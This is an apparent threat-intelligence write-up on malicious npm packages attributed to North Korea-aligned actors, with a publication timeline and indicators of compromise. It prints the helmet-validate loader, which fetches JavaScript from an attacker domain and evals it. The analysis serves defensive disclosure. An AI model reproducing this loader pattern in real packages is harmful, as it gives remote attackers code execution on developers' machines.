North Korea Still Attacking Developers via npm
In the past few weeks, we've observed a renewed surge of activity from groups aligned with North Korean objectives, publishing several packages to npm. This latest wave appears to involve multiple groups, or at least exhibits several distinct publication patterns, TTPs (Tactics, Techniques, and Procedures), and attack types we've seen in the past. The renewed surge began on August 12, 2024, with the publication of temp-etherscan-api and two versions of ethersscan-api. Approximately a week and a half later, telegram-con and another version of ethersscan-api were published. These packages appear to contain similar malware, as does qq-console, published two weeks later on August 27. Behaviors in this campaign lead us to believe that qq-console is attributable to the North Korean campaign known as "Contagious Interview".
These attacks are characterized by multi-stage obfuscated JavaScript that downloads additional malware components from remote servers. These include Python scripts and even a full Python interpreter, which then systematically searches for and attempts to exfiltrate sensitive data from cryptocurrency wallet browser extensions while establishing persistence on the victim's machine. We've written about this form of malware twice before, first in February 2024 and again in June 2024, detailing its evolution and impact on the developer community.
On August 23, just minutes after the most recent version of ethersscan-api and telegram-con were published, we saw helmet-validate published. This package takes a different approach, simply inserting the following code into a file called config.js:
```javascript
const axios = require("axios")
async function runCode() {
  // Fetch the second stage from the attacker-controlled endpoint (domain defanged as in this write-up)
  const res = await axios.get("http://ipcheck[.]cloud/api/user/thirdcookie/v3/197");
  // Execute whatever JavaScript the server returned in the "cookie" field
  eval(res.data.cookie);
}
runCode();
```
This code directly evals JavaScript returned from an endpoint located at the ipcheck[.]cloud domain. Our investigation revealed that ipcheck[.]cloud resolves to the same IP address (167[.]88[.]36[.]13) that mirotalk[.]net resolved to when it was online. The mirotalk domain was previously used in fake job campaigns attributed to North Korean threat actors, suggesting a potential link between these attacks.
Finally, on August 27, we also identified the publication of sass-notification; behaviors in this campaign lead us to believe that this package is attributable to “Moonstone Sleet”. The attack vector used by this package is also familiar, and we've written about it previously, first in November 2023 and more recently in July 2024. These attacks are characterized by using obfuscated JavaScript to write and execute batch and PowerShell scripts. The scripts download and decrypt a remote payload, execute it as a DLL, and then attempt to clean up all traces of malicious activity, leaving behind a seemingly benign package on the victim’s machine.
The diversity and simultaneous deployment of these attack vectors reveal a coordinated and relentless campaign by North Korean-aligned threat actors. These adversaries continuously exploit the inherent trust in the npm ecosystem to compromise developers, infiltrate companies, and steal cryptocurrency or any other assets that could lead to illicit financial gains.
Publication Timeline
Name | Version | Publication Time |
---|---|---|
qq-console | 0.0.1 | 2024-08-27 19:07 |
sass-notification | 1.0.0 | 2024-08-27 18:15 |
helmet-validate | 0.0.1 | 2024-08-23 02:39 |
ethersscan-api | 0.0.3 | 2024-08-23 02:31 |
telegram-con | 0.0.1 | 2024-08-23 02:31 |
ethersscan-api | 0.0.2 | 2024-08-12 03:53 |
ethersscan-api | 0.0.1 | 2024-08-12 03:53 |
temp-etherscan-api | 0.0.1 | 2024-08-12 02:47 |
IOCs
ipcheck[.]cloud
45[.]61[.]158[.]14
167[.]88[.]36[.]13
95[.]164[.]17[.]24
Package Name | Version | Package Tarball Sha256 |
---|---|---|
ethersscan-api | 0.0.1 | d4f3113e1e0384bcf37c39678deb196fb5b39f15c4990134b6b8637be74e5a2e |
ethersscan-api | 0.0.2 | f1f3002dec6e36e692e087626edd9b6b0f95a176c0c204d4703ccb4f425aa317 |
ethersscan-api | 0.0.3 | 5e5313aaf281c8a8eed29ba2c1aaa5aa65bc174bcd0be466f4533712599db758 |
helmet-validate | 0.0.1 | 2a00838ccd08b26c7948d1dd25c33a114dd81c3bcee3de595783e6f396e7f50e |
qq-console | 0.0.1 | aec21b53ee4ae0b55f5018fc5aaa5a4f095a239a64272ca42047c40ec3c212c0 |
sass-notification | 1.0.0 | f7c142178605102ee56f7e486ba68b97f3f6b522994b24f4116dbbd2abc28cec |
telegram-con | 0.0.1 | 0110318f70072171c0edc624c8e8be38892f984b121d6a5a5ced1f6b0b45dbd0 |
temp-etherscan-api | 0.0.1 | 94da263d603bf735ab85f829b564261e59a1d13915d21babe58e72435bfe32ab |